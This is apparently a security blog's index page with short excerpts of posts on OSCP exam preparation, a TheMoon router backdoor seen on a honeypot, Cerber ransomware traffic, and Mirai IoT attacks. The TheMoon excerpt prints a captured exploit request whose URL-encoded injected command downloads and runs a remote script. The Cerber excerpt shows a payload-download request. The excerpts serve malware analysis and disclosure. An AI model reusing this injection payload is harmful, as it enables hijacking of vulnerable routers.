How to pass the OSCP Offensive Security Certified Professional Exam Step-by-Step Guide – Recon & Scanning PART 1

Passing the Offensive Security Certified Professional Exam is not like passing any other exam, this isn’t a multiple choice “what runs on port 22?” Security+ style brain dump exam. This is a 24 hour hands on, prove you have what it takes exam. If you think your up to the challenge we have created a… Read More »

Share Button

New Linux Backdoor found in the wild TheMoon family of malware ASUS Router NTTPD Vulnerability

New Linux Backdoor found in the wild on one of our honeypots – This bot belongs to the TheMoon family of malware The vulnerable ASUS router will  download and execute the binary file .nttpd from the attacker controlled website. POST /hndUnblock.cgi HTTP/1.0 \r\nAccept: */*\r\n Host: 81.171.12.232\r\n User-Agent: Wget(linux)\r\n Content-Length: 414\r\n Content-Type: application/x-www-form-urlencoded submit_button=&change_action=&action=&commit=&ttcp_num=2&ttcp_size=2&ttcp_ip=-h `%63%64%20%2F%74%6D%70%3B%72%6D%20%2D%66%20%6E%6D%6C%74%31%2E%73%68%3B%77%67%65%74%20%2D%4F%20%6E%6D%6C%74%31%2E%73%68%20%68%74%74%70%3A%2F%2F%66%6C%6F%77%65%72%74%6F%77%65%72%73%62%6C%61%62%6C%61%2E%74%6F%70%2F%6E%6D%6C%74%31%2E%73%68%3B%63%68%6D%6F%64%20%2B%78%20%6E%6D%6C%74%31%2E%73%68%3B%2E%2F%6E%6D%6C%74%31%2E%73%68`&StartEPI=1′ https://virustotal.com/en/file/b963223d3f39884ebed3e647390e55d8de86c7e3c5daaae6509379a6fc3ba97e/analysis/1489518585/ Antivirus… Read More »

Share Button

CERBER Ransomware Hidden C2 Servers Traffic and Malware Analysis

Cerber ransomware has been one of the most prolific crimeware botnets to have arisen, it is currently generating an estimated $2.5 million dollars a year and rising. Once infected, your content is encrypted and held for ransom as the name implies. You will see an image popup with instructions on how to reclaim your data… Read More »

Share Button

Malspam E-mail Leads to Ransomware Cerber/Zerber Infection TRAFFIC SAMPLE

  Example of files that were encrypted and protected:   The domain name ftoxmpdipwobp4qy.joa688.top was NX and not required for the purchase process. 2016-12-16 01:29:05.256362 IP 192.168.1.102.50104 > 72.167.232.152.80: Flags [P.], seq 0:303, ack 1, win 256, length 303: HTTP: GET //up1/1/4fv3b5.exe HTTP/1.1 E..W..@……..fH……P.n……P…….GET //up1/1/4fv3b5.exe HTTP/1.1 Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */* Accept-Language: en-us User-Agent: Mozilla/4.0… Read More »

Share Button

Mirai Internet of Things IoT DDoS sets record 600+ GB/Sec and your refrigerator could have been one of the attackers!

What is the Internet of Things (IoT) ? In today’s technological expansion everything seems to be connected to the Internet, for instance in my own home I have my refrigerator, thermostat, video cameras, tablets, cell phone, TV, xbox, DirecTV box, printer, security system, laptops, servers, workstations, Ethernet tap, a switch and a router all connected… Read More »

Share Button